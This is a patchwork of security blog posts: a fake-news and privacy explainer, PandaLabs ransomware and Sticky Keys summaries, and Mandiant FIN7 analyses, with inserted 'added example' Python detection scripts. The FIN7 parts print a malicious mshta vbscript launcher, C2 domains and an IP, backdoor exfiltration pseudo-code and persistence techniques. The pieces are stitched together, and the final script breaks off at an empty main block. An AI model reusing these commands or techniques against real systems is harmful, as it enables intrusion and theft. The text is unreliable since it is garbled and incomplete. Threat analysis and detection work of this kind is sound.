  • Groups with vested interests manipulate the volume and narrative of news
  • Photographs are morphed
  • Old photographs are used to depict recent events
  • Real photographs are used to defame

Obviously, it is also quite easy to catch the perpetrator. A few years back, a Twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other content that results in incitement or defamation now attract stronger penalties and jail terms, and police are more aware and vigilant.
Most cybercitizens unwittingly help fake news go viral by recirculating it. Each forward creates a sense that the news must be true, because the previous person must have validated it before sending it on.

Pause before forwarding, evaluate its veracity, and only then forward. Do not be the link in the chain responsible for the circulation of fake news.
Cybercitizens, do take care when crafting messages on social media – a little mischief may earn you a few years in government-paid accommodation – jail. Advise your children to be responsible and to cross-check news received over social media before recirculating or believing it.

What is Data Privacy and why is it an important issue?

The question of whether privacy is a fundamental right is being argued before the honourable Supreme Court of India. It is a topic to which a young India is waking up. Privacy is often equated with liberty, and young Indians want adequate protection to express themselves.

Privacy according to Wikipedia is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There is little contention over the fact that privacy is an essential element of Liberty and the voluntary disclosure of private information is both part of human relationships and a digitized economy.

Data privacy is debated because of the inherent potential for surveillance and disclosure of electronic records that are private by nature, such as sexual orientation, medical records, credit card information, and email.

Disclosure could take place through wrongful use and distribution of the data, for example for marketing, through surveillance by governments, or through outright data theft by cyber criminals. In each case, a cybercitizen's right to disclose specific information to specific companies or people, for a specific purpose, is violated.

Citizens in western countries are legally protected through data protection regulation. Eight principles are designed to prevent unauthorized use of personal data by governments, organizations and individuals:

Lawfulness, fairness and transparency
Personal data needs to be processed based on the consent given by data subjects. Companies have an obligation to tell data subjects what their personal data will be used for. Data acquired cannot be sold to other entities, say marketers.
Purpose limitation
Personal data collected for one purpose should not be used for a different purpose. If data was collected to deliver an insurance service, it cannot be used to market a different product.
Data minimization
Organizations should restrict collection of personal data to only those attributes needed to achieve the purpose for which consent from the data subject has been received.
Accuracy
Data has to be collected, processed and used in a manner which ensures that it is accurate. A data subject has the right to inspect and even correct the data.
Storage limitation
Personal data should be collected for a specific purpose and not be retained for longer than necessary in relation to that purpose.
Integrity and confidentiality
Organizations that collect this data are responsible for its security against data theft and against data entry or processing errors that may alter the integrity of the data.
Accountability
Organizations are accountable for the data in their possession.
Cross-border personal information requirements
Personal information must be processed and stored in a secured environment, which must be ensured even if the data is processed outside the borders of the country.

It is important for cybercitizens to understand their privacy rights particularly in context of information that can be misused for financial gain or to cause reputational damage.




The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report


Developments in cyber-crime, cyberwarfare and AI mark the first quarter of 2017, as indicated by the PandaLabs Q1 Report. The report by Panda Security’s malware research facility identifies prominent tactics, attack methods and shifts in the industry.

The cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and of organisations like vDOS, a service specialising in DDoS attacks, indicates the professionalism of the cyber-crime industry. In Q1 we continued to see new and adapted attack methods such as RDPatcher, malware detected by PandaLabs in its attempt to access the victim’s endpoint and prepare it for rental on the Dark Web.

Politically motivated cyber-attacks

Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, cyberwarfare has become a popular tactic in enforcing political agendas. In Q4 of 2016, we saw some of the first high-profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity of the development is clear, as countries like Germany have now begun to develop cyber-command centres to monitor online activity; this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a Smart TV using only a DVB-T signal.

A perfect device for eavesdropping

Recent developments in robotics and AI have led to the belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs: virtual assistants like Google Home and Amazon Echo can become a dangerous inroad for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on, making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence useful to their case.

Over the course of 2016, ransomware attacks earned criminals billions of Rand. Fuelled by its profitability, ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered the ransomware variant WYSIWYE, which allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give control back to the victim.

See the full report by PandaLabs here.

The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Service Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process

Detection

Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 
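As an added example (not Mandiant or FireEye tooling), the three recommendations above turned into a triage routine over constructed Sysmon-style events. The event field names, host names, GUID and temp-file name are assumptions; the directories and registry keys are the ones listed above, and the .tmp staging under C:\Windows\Temp is the behaviour described earlier in the post.

```python
"""Triage constructed endpoint telemetry against the three shim-database
detections above. Added example, not Mandiant or FireEye tooling: the event
shape (Sysmon-like dicts), host names, GUID and temp-file name are
assumptions; the directories and registry keys are the ones in the post."""
from collections import defaultdict
from pathlib import PureWindowsPath

SHIM_DIRS = (r"C:\Windows\AppPatch\Custom",
             r"C:\Windows\AppPatch\Custom\Custom64")
SHIM_KEYS = (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom",
             r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB")

def in_shim_dir(path):
    """True when the file sits directly in a default shim directory (case-insensitive)."""
    parent = PureWindowsPath(path).parent
    return any(parent == PureWindowsPath(d) for d in SHIM_DIRS)

def under_shim_key(key):
    """True for the AppCompatFlags keys themselves or any subkey of them."""
    k = key.lower().rstrip("\\")
    return any(k == s.lower() or k.startswith(s.lower() + "\\") for s in SHIM_KEYS)

def sdbinst_argument(command_line):
    """Database path handed to sdbinst.exe (flags such as -q are skipped);
    quoted paths containing spaces are not handled by this simple split."""
    args = [a for a in command_line.split()[1:] if not a.startswith("-")]
    return args[-1] if args else None

def suspicious_db_source(db_path):
    """FIN7 staged databases as .tmp files under C:\\Windows\\Temp before
    registering them; flag anything that is not already an .sdb file or
    that is registered straight out of the Temp directory."""
    p = PureWindowsPath(db_path)
    return p.suffix.lower() != ".sdb" or p.parent == PureWindowsPath(r"C:\Windows\Temp")

def triage_event(ev):
    """Return the rule (numbered as in the list above) an event matches, or None."""
    kind = ev["event"]
    if kind == "file_create":
        if ev["path"].lower().endswith(".sdb") and in_shim_dir(ev["path"]):
            return "1-shim-file"
    elif kind in ("registry_key_create", "registry_value_set"):
        if under_shim_key(ev["key"]):
            return "2-shim-registry"
    elif kind == "process_create":
        if PureWindowsPath(ev["image"]).name.lower() == "sdbinst.exe":
            return "3-sdbinst-exec"
    return None

def triage(events):
    """Host -> set of rules fired; a host hitting all three shows the full
    register / copy-to-AppPatch / registry-key chain described in the post."""
    hits = defaultdict(set)
    for ev in events:
        rule = triage_event(ev)
        if rule:
            hits[ev["host"]].add(rule)
    return dict(hits)

SAMPLE_EVENTS = [  # constructed telemetry, not data from the incidents
    {"host": "ws-finance-07", "event": "process_create",
     "image": r"C:\Windows\System32\sdbinst.exe",
     "command_line": r"sdbinst.exe -q C:\Windows\Temp\8F3C.tmp"},
    {"host": "ws-finance-07", "event": "file_create",
     "path": r"C:\Windows\AppPatch\Custom\Custom64\{5d4e1c2a-7b10-4e3f-9a8c-0b6f2d1e7c44}.sdb"},
    {"host": "ws-finance-07", "event": "registry_key_create",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{5d4e1c2a-7b10-4e3f-9a8c-0b6f2d1e7c44}"},
    {"host": "ws-hr-02", "event": "file_create",            # wrong extension: no hit
     "path": r"C:\Windows\AppPatch\Custom\readme.txt"},
    {"host": "ws-hr-02", "event": "process_create",         # unrelated installer: no hit
     "image": r"C:\Program Files\Vendor\setup.exe", "command_line": "setup.exe /silent"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, sorted(rules))
```

Legitimate application installers also run sdbinst.exe, so rule 3 on its own is noisy; the value comes from the host-level correlation and from where the database was staged, which is why the source-path check is kept separate.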

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named scheduled task for persistence that launches “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com
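To show what that retry pattern looks like in telemetry, here is an added detection example (not FireEye code) that refangs the post's indicator into an anchored regular expression and runs it over constructed DNS query log lines. The log format and host names are assumptions; the domain pattern is the indicator given above.

```python
"""Scan constructed DNS query logs for the stager retry pattern above.
Added example, not FireEye code: the log line format and host names are
assumptions; the domain pattern is the post's own indicator."""
import re
from collections import defaultdict

# Indicator exactly as written in the post (defanged); refanged before use
STAGER_PATTERN_DEFANGED = "[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com"
C2_APEX_DEFANGED = "proslr3[.]com"

def refang(indicator):
    return indicator.replace("[.]", ".")

def pattern_to_regex(defanged):
    """Keep the [a-z] classes from the post's notation, escape every other
    character literally, and anchor both ends so 'xaaa.stage...' cannot match."""
    parts = re.split(r"(\[a-z\])", refang(defanged))
    body = "".join(p if p == "[a-z]" else re.escape(p) for p in parts)
    return re.compile("^" + body + "$")

STAGER_RE = pattern_to_regex(STAGER_PATTERN_DEFANGED)
C2_APEX = refang(C2_APEX_DEFANGED)

# Constructed log: "<timestamp> <client host> <qtype> <qname>"
SAMPLE_DNS_LOG = """\
2017-04-10T14:02:11Z ws-finance-07 A aaa.stage.14919005.www1.proslr3.com
2017-04-10T14:02:41Z ws-finance-07 A aab.stage.14919005.www1.proslr3.com
2017-04-10T14:03:11Z ws-finance-07 A AAC.stage.14919005.www1.proslr3.com
2017-04-10T14:03:12Z ws-finance-07 A www.example.com
2017-04-10T14:04:00Z ws-hr-02 A stage.14919005.www1.proslr3.com
2017-04-10T14:04:05Z ws-hr-02 A notproslr3.com
"""

def scan_dns_log(text):
    """Return host -> {"stager": [...], "apex": [...]}: exact stager-pattern
    matches, and any other query under the attacker apex domain."""
    hits = defaultdict(lambda: {"stager": [], "apex": []})
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue                        # skip malformed lines
        _, host, _, qname = fields
        qname = qname.lower().rstrip(".")   # DNS is case-insensitive; drop root dot
        if STAGER_RE.match(qname):
            hits[host]["stager"].append(qname)
        elif qname == C2_APEX or qname.endswith("." + C2_APEX):
            hits[host]["apex"].append(qname)
    return dict(hits)

def rotating_prefixes(qnames):
    """Distinct three-letter leading labels: several from one host within a
    few minutes is the reattempt behaviour the post describes."""
    return {q.split(".", 1)[0] for q in qnames}

if __name__ == "__main__":
    for host, found in scan_dns_log(SAMPLE_DNS_LOG).items():
        print(host, sorted(rotating_prefixes(found["stager"])), found["apex"])
```

The apex check catches the same infrastructure when the leading label does not fit the three-letter form, while the suffix comparison with a leading dot keeps look-alike registrations such as notproslr3.com out of the results.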

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, processor, BIOS and running processes) gathered with WMI queries
  • processList: Sends the list of running processes
  • screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VBScript
  • runexe: Executes an EXE file
  • runps1: Executes a PowerShell script
  • delete: Deletes the specified file
  • update: Updates the specified file

All communication between the backdoor and the attacker C2 is encoded using the following technique, represented in pseudo code:

Function send_data(data)
    random_string = custom_function_to_generate_random_string()
    encoded_data = URLEncode(SimpleEncrypt(data))
    post_data("POST", random_string & "=" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
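An added example (not lnk-parser or Mandiant code) that decodes what the post reads out of those identifiers: the file identifier is a time-based (version 1) UUID, so its timestamp, clock sequence and node MAC can be recovered with the standard library, and the 08:00:27 OUI is the VirtualBox default NIC prefix. The values are the ones listed above; the host-name field is not part of the UUID and is left out.

```python
"""Decode the UUID version 1 "droid" identifiers that Windows stores in LNK
link-tracker data. Added example, not lnk-parser or Mandiant code; the sample
values are the ones listed in the post."""
import uuid
from datetime import datetime, timedelta, timezone

# 100-ns intervals between the UUID epoch (1582-10-15) and the Unix epoch
UUID_TO_UNIX_EPOCH_100NS = 0x01B21DD213814000
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# OUI prefixes worth flagging; 08:00:27 is the VirtualBox default NIC prefix
VM_OUI = {"08:00:27": "VirtualBox"}

def decode_uuid_v1(text):
    """Return the fields embedded in a time-based UUID, or None for other
    versions (the volume identifiers above are random, version 4)."""
    u = uuid.UUID(text)
    if u.version != 1:
        return None
    # u.time is the 60-bit timestamp with the version nibble already stripped
    unix_100ns = u.time - UUID_TO_UNIX_EPOCH_100NS
    ts = UNIX_EPOCH + timedelta(microseconds=unix_100ns // 10)
    mac = ":".join(f"{(u.node >> shift) & 0xFF:02x}" for shift in range(40, -1, -8))
    return {
        "timestamp_utc": ts,
        "clock_seq": u.clock_seq,
        "mac": mac,
        # RFC 4122: a randomly generated node id has the multicast bit set,
        # a real NIC address does not
        "mac_from_real_nic": not (u.node >> 40) & 0x01,
        "vm_vendor": VM_OUI.get(mac[:8]),
    }

def tracker_summary(volume_id, file_id, birth_volume_id, birth_file_id):
    """Combine the four identifiers: equal current/birth pairs mean the LNK has
    not been copied to another volume since creation; the birth file id carries
    the creating host's clock and MAC."""
    origin = decode_uuid_v1(birth_file_id) or decode_uuid_v1(file_id)
    return {
        "moved_since_birth": (volume_id, file_id) != (birth_volume_id, birth_file_id),
        "origin": origin,
    }

# Identifiers from the FIN7 LNK described in the post
FIN7_LNK = dict(
    volume_id="e2c10c40-6f7d-4442-bcec-470c96730bca",
    file_id="a6eea972-0e2f-11e7-8b2d-0800273d5268",
    birth_volume_id="e2c10c40-6f7d-4442-bcec-470c96730bca",
    birth_file_id="a6eea972-0e2f-11e7-8b2d-0800273d5268",
)

if __name__ == "__main__":
    print(tracker_summary(**FIN7_LNK))
```

The timestamp is kept as integer microseconds rather than a float division so the value matches the 100-ns field exactly; on this UUID it yields 2017-03-21 12:12:28.500 UTC, clock sequence 2861 and node 08:00:27:3d:52:68, the figures quoted above.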

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

A User-Friendly Interface for Cyber-criminals

Installing malware through Remote Desktop Protocol (RDP) is a popular attack method used by many cyber-criminals. Over the past few months Panda Security’s research facility, PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through a brute-force attack on RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware to start the encryption.

Recently, however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which it can be configured according to the attacker's preferences, starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to act on.

Advanced attacks of the kind we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology such as AD360 guarantees better protection against new-age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Hackers Spark Revival of Sticky Keys Attacks

Hackers are constantly trying to find new ways to bypass cyber-security efforts, sometimes turning to older, almost forgotten methods to gain access to valuable data. Researchers at PandaLabs, Panda Security’s anti-malware research facility, recently detected a targeted attack which did not use malware, but rather used scripts and other tools associated with the operating system itself in order to bypass scanners.

Using an attack method that has gained popularity recently, the hackers launch a brute-force attack against a server with the Remote Desktop Protocol (RDP) enabled. Once they have the log-in credentials of a device, the intruders gain complete access to it.
At this stage, the attackers run the sethc.exe file with the parameter 211 from the computer’s Command Prompt window (CMD), turning on the ‘Sticky Keys’ feature.

Next, the hacker initiates Traffic Spirit, a traffic generator application that ensures the attack is lucrative for the cyber-criminals.

Once this is complete, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:
  • registery.reg
  • SCracker.bat
  • sys.bat

The hacker then runs the Windows registry editor (Regedit.exe) to add the key contained in the registery.reg file.

This key ensures that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat is run. This is a batch file that implements a very simple authentication system; running the file displays a login prompt.

The user name and password are obtained from two variables included in the sys.bat file.

This creates a backdoor into the device through which the hacker gains access. Using the backdoor, the hacker is able to connect to the targeted computer without entering the Windows login credentials: they enable the Sticky Keys feature and enter the relevant user name and password to open a command shell.

The command shell shortcuts allow the hacker to access certain directories, change the console colour, and make use of other typical command-line actions.

The attack doesn’t stop there. To capitalise on the intrusion, a Bitcoin miner is installed on every compromised computer. This software uses the victims’ computer resources to generate the virtual currency without them realising it.
Even if the victim realises their device has been breached and changes their credentials, the hacker is still able to gain access to the system: pressing the SHIFT key five times enables Sticky Keys, allowing the cyber-criminal to activate the backdoor once again.

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organisation from serious financial and reputational harm. Business leaders need to recognise the need for advanced security, such as AD360, to protect their network from these kinds of attacks.
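The post does not reproduce the key that registery.reg adds. The usual way to make another program run whenever sethc.exe is launched is an Image File Execution Options (IFEO) "Debugger" value, and that mechanism is assumed here. As an added example (not PandaLabs code), a parser for .reg export files that flags IFEO Debugger values set on the accessibility binaries reachable from the logon screen; the sample export, including the SCracker.bat path, is constructed.

```python
"""Parse a Windows .reg export and flag Image File Execution Options (IFEO)
"Debugger" values that redirect accessibility binaries to another program.
Added example, not PandaLabs code: the post does not show registery.reg, so
the IFEO mechanism is an assumption, and the sample export is constructed."""
import re
from pathlib import PureWindowsPath

# Accessibility executables that can be started from the Windows logon screen
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}
IFEO_MARKER = "\\image file execution options\\"   # compared against lower-cased keys

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')

def _unescape(s):
    """Undo the .reg string escaping: \\" -> " and \\\\ -> \\."""
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg(text):
    """Return {key: {value_name: data}}. Only REG_SZ ("...") data is decoded;
    other types (dword:, hex:) are kept raw so they are visible but not
    mis-read. Real exports are UTF-16 files; decode them before calling."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            reg.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group("default") else _unescape(m.group("name"))
            data = m.group("data")
            if data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            reg[current][name] = data
    return reg

def find_ifeo_debuggers(reg):
    """One finding per IFEO Debugger value: the target executable, the
    debugger command, and whether the target is an accessibility binary."""
    findings = []
    for key, values in reg.items():
        if IFEO_MARKER not in key.lower():
            continue
        # registry value names are case-insensitive
        debugger = next((v for n, v in values.items() if n.lower() == "debugger"), None)
        if debugger is None:
            continue
        target = PureWindowsPath(key).name.lower()
        findings.append({"target": target, "debugger": debugger,
                         "accessibility_hijack": target in ACCESSIBILITY_BINARIES})
    return findings

# Constructed export: the sethc.exe entry models the post's attack, the
# notepad.exe entry is a benign non-string IFEO value the parser must ignore
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\cmdacoBin\\SCracker.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000001
'''

if __name__ == "__main__":
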